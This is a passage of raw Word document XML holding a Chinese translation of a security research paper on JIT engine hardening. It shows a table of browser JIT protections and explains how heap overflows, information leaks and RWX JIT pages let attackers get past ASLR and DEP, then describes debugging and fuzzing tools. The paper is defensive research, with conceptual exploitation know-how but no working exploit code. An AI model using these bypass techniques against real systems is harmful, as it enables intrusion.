                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
            <w:r w:rsidR="00691AB9">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>†</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5A0BF2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="388914A9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DEA77C0" w14:textId="2D81305C" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="422" w:right="393"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
            <w:r w:rsidR="00691AB9">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>†</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="527E3BBF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="560"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2739" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A32BD8B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>随机码库</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="379E7349" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="4" w:line="265" w:lineRule="exact"/>
              <w:ind w:left="108" w:right="88"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>抵消</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B97FAD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="21"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="710" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B63E69D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="22"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7292FBE9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1110" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BD7029F" w14:textId="5009AC6B" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="410"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
            <w:r w:rsidR="00691AB9">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>†</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="888" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="528C53AB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="26"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="784" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C72B304" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="27"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074A8FE0" w14:textId="4822C013" w:rsidR="0026102A" w:rsidRDefault="000D3EB1">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="271" w:lineRule="exact"/>
              <w:ind w:left="422" w:right="393"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Y</w:t>
            </w:r>
            <w:r w:rsidR="00691AB9">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="222222"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>†</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FC6F124" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1DDB5B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="94" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="911"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>*我们对IE9进行的研究的一部分是基于与Microsoft安全工程师的对话以及他们关于加强自己的JIT实现的公开演讲。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A74ED66" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C45CDC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="866"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>** IE9具有安全（RX）页面权限，保护页面不太重要。但是，最初创建这些页面时最初为其分配了RWX。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B5908" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04038484" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">†默认情况下，已实现但未在源或配置中启用此功能。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（Tamarin和TraceMonkey引擎共享NanoJIT代码库。我们发现了一个简单的NOP填充功能，该功能已实现，但意外禁用。）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF7221" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CA1BFB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正如我们已经显示的那样，JIT引擎采用和实施已知的保护机制的速度很慢，例如随机NOP插入，填充和JIT分配限制。像任何复杂的软件一样，与不存在应用程序相比，JIT使应用程序面临更大的利用风险，尤其是考虑到其目的是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成本机</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可执行代码。当充分利用内存损坏保护机制时，不受信任的输入对JIT输出的影响程度使这些组件处于明显的劣势。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0244D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499DA00C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="487"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过设计，JIT会禁止其他安全功能，例如代码签名。在诸如iOS之类的平台上，其中所有可执行段都必须源自已签名的应用程序，而JIT引擎使这成为不可能。苹果已经宣布计划在iOS 5.0中为移动Safari支持Nitro JIT。因此，该应用程序的代码签名功能被禁用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11D2C9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D04E79" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>考虑通过堆溢出漏洞和信息泄漏漏洞来覆盖函数指针的情况。假设目标进程正在运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F4F8D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E7B94A9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="401"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在强化的ASLR和DEP被强制执行的强化环境下，完整的ASLR包括所有库和.text库的随机化。攻击者可以利用信息泄漏来发现特定DLL的基地址，该DLL包含用于代码重用的必要ROP小工具。这是一个相当标准的方案，并且在实践中可靠地工作。引入JIT引擎后，即使其中一个引擎包含一个或所有已知的保护机制，攻击者现在也可以直接影响可执行内存。这有可能将更多可用的代码小工具引入到内存中，而这些内存在其他情况下将</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可用。将此与信息泄漏结合起来以发现这些JIT页面在内存中的位置，为代码重用利用提供了额外的潜力。此外，不安全的RWX页面权限的存在还引发了JIT代码超过通过相邻RW页面进行写入的可能性。在这种情况下，攻击者通过相邻页面上的缓冲区溢出用原始x86代码覆盖RWX JIT页面，然后触发该位置的JIT编写的JavaScript或中间表示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4602F953" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B23CE80" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>像所有内存保护机制一样，这些机制各自为攻击者提供了自己要克服的障碍。就像在没有DEP的情况下强制执行A​​SLR或在没有ASLR的情况下执行DEP一样，仅实现这些JIT保护中的一两个即可为攻击者利用弱化的环境。结合使用时，它们将提供强化的JIT运行时，攻击者将不得不更加努力地加以利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B5ED2D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0958A7C0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_bookmark21"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29282068" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036FFD57" w14:textId="58C7B06B" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="435"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了促进我们的研究，我们开发了许多工具，包括</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fussers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，动态调试器</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和数据收集工具。我们不仅仅是为自己编写这些工具，我们的</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具链还将</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发布给安全社区，以帮助推进JIT安全研究的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56B7FC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDD4664" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E2504F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2FA26A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4176B3CB" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DC532F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_bookmark22"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调试和跟踪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FDCC8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A75D307" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="555"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了提取和分析JIT引擎生成的本机代码，我们在Ragweed引擎[13]之上创建了几个实用程序。 Ragweed是用纯Ruby编写的跨平台32位（Win32，Linux，OSX）本机代码调试库。使用Nerve动态调试器[14]（基于Ragweed构建），我们编写了断点脚本来提供对JIT生成的本机代码的访问。这使我们能够检测本机代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D9360" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007BAFEE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>生成器实时观察其行为并在运行时检查JIT生成的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24190013" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E249EBC" w14:textId="5BCCB61A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="488"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>我们的</w:t>
      </w:r>
